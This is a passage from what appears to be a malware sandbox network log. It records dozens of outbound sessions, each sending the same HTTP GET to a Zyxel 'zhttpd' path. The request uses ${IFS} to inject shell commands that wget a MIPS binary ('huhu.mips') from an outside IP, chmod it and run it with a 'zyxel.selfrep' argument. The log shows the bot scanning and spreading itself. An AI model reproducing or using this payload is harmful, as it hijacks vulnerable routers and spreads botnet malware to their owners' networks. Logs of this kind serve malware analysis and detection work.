                                                        Feb 2, 2024 06:21:27.277429104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8665192.168.2.1459580191.110.13.9443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.277479887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8666192.168.2.145090044.208.190.68443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.277493000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8667192.168.2.143734620.56.28.90443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.277551889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8668192.168.2.1447136122.155.186.64443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.277594090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8669192.168.2.143712072.56.8.60443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.277638912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8670192.168.2.145969469.21.51.4443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.277673006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8671192.168.2.1441764113.242.12.97443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.277724028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8672192.168.2.1460716218.143.167.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.277755976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8673192.168.2.1452090209.179.189.59443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.277803898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8674192.168.2.1445672140.145.95.16443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.277851105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8675192.168.2.1444684211.188.189.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.277899981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8676192.168.2.143544820.38.206.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.277918100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8677192.168.2.1457110167.194.123.49443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.277995110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8678192.168.2.1454968140.210.237.150443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.278016090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8679192.168.2.1450526166.97.92.44443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.278068066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8680192.168.2.145680836.136.251.216443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.278098106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8681192.168.2.145581831.245.46.83443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.278148890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8682192.168.2.144765482.120.212.180443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.278194904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8683192.168.2.143478644.94.46.131443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.278233051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8684192.168.2.144644071.46.194.191443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.278283119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8685192.168.2.1436632219.63.160.209443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.278323889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8686192.168.2.143372252.167.213.119443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.278387070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8687192.168.2.1442680136.237.148.169443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.278389931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8688192.168.2.1442920151.28.142.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.278439045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8689192.168.2.1436920140.41.168.240443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.278479099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8690192.168.2.144054070.30.140.116443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.278507948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8691192.168.2.1460824172.73.125.192443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.278568983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8692192.168.2.144726431.193.29.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.278597116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8693192.168.2.1454296150.197.67.49443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.278636932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8694192.168.2.146056849.47.208.45443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.278665066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8695192.168.2.1445948213.121.214.194443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.278700113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8696192.168.2.1444100206.210.84.72443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.278753996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8697192.168.2.1444580134.216.186.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.278799057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8698192.168.2.143520262.177.66.121443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.278844118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8699192.168.2.1453634140.91.26.181443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.278897047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8700192.168.2.1434918107.6.43.179443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.278915882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8701192.168.2.1452644177.182.32.36443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.278973103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8702192.168.2.143414482.113.160.82443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.279001951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8703192.168.2.1443474195.150.203.210443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.279052019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8704192.168.2.144786053.74.155.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.279095888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8705192.168.2.145793417.213.238.108443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.279135942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8706192.168.2.1441518162.10.88.21443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.279167891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8707192.168.2.1460226211.80.133.8443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.279198885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8708192.168.2.1456424139.86.213.145443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.279249907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8709192.168.2.1442800109.170.23.82443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.279282093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8710192.168.2.146090445.232.10.146443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.279335022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8711192.168.2.145468071.113.186.177443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.279382944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8712192.168.2.1451006128.130.96.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.279429913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8713192.168.2.1448612131.105.121.77443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.279469967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8714192.168.2.145296287.17.199.230443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.279490948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8715192.168.2.14566782.210.168.239443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.279535055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8716192.168.2.143580281.45.182.225443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.279556990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8717192.168.2.1441190131.176.2.184443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.279603004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8718192.168.2.144333287.191.32.161443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.279635906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8719192.168.2.1460416137.159.70.2443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.279676914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8720192.168.2.143438023.242.202.166443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.279730082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8721192.168.2.1457378172.55.77.45443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.279778004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8722192.168.2.145316664.5.25.173443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.279829979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8723192.168.2.1453976161.59.231.118443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.279870987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8724192.168.2.145596872.224.151.74443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.279890060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8725192.168.2.1460486137.155.18.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.279947996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8726192.168.2.1435692218.232.66.137443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.279970884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8727192.168.2.1450776199.171.246.156443
                                                        TimestampBytes transferredDirectionData
